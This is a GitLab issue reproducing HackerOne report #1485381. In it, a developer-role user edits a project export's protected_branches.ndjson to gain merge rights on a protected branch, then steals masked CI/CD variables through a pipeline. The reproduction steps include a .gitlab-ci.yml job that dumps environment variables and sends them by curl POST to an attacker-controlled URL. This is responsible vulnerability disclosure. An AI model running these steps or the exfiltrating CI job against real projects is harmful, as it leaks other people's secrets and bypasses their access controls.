Skip to content

User with developer role (group) can modify Protected branches -> Allowed to merge setting on imported project

HackerOne report #1485381 by justas_b on 2022-02-18, assigned to @nmalcolm:

Report | Attachments | How To Reproduce

Report

Hello,

Summary

A user with developer role (group) can steal masked group/project CI/CD variables by modifying Project settings -> Protected branches -> Allowed to merge setting on imported project (tree/project/protected_branches.ndjson file).

Steps to reproduce
  1. Create 2 accounts
  2. Create a group with account A and masked CI/CD group variables (Group settings -> CI/CD -> Variables)

secretvar_masked.png

  1. Create a personal project with account B and export it
  2. Invite account B (developer) to account A's (owner) group
  3. With account B, modify the project import file, go to tree/project/protected_branches.ndjson
  4. Change the "merge_access_levels":[{"access_level":}] value to 30 if its 40

merge_access_levels_30.png

  1. Upload the modified project to account A's group with account B
  2. By default, only maintainers are allowed to merge into protected branches ("merge_access_levels":[{"access_level":}] is 40 - 40 = maintainer, 30 = developer, etc.)
  3. Create a new branch with account B (developer)
  4. Add the following .gitlab-ci.yml file to the newly created branch and create a merge request
image: ruby:latest

job_name2:  
 script:  
   - export > test.txt  
   - curl -X POST --data "$(cat test.txt)" (attacker controlled website's url)

new_branch_malicious_gitlab_ci_yml.png

[REDACTED]

  1. Merge the newly created branch into main (protected) branch (with account B - developer)

merge_to_protected_as_developer.png

  1. A pipeline run against a protected branch will send sensitive data to attackers website using curl

[REDACTED]

The impact is pretty similar to my other report #1256017

What is the current bug behavior?

It is possible to modify the "merge_access_levels":[{"access_level":} value on imported projects

What is the expected correct behavior?

The "merge_access_levels":[{"access_level":} should always be default - 40

Relevant logs and/or screenshots

(Paste any relevant logs - please use code blocks (```) to format console output,
logs, and code as it's very hard to read otherwise.)

Output of checks

This bug happens on GitLab.com

Impact

User with developer role (group) can steal masked group and project CI/CD variables. Developer can also modify main branch without maintainer's permission.

Attachments

How To Reproduce

Please add reproducibility information to this section:

Edited by Nick Malcolm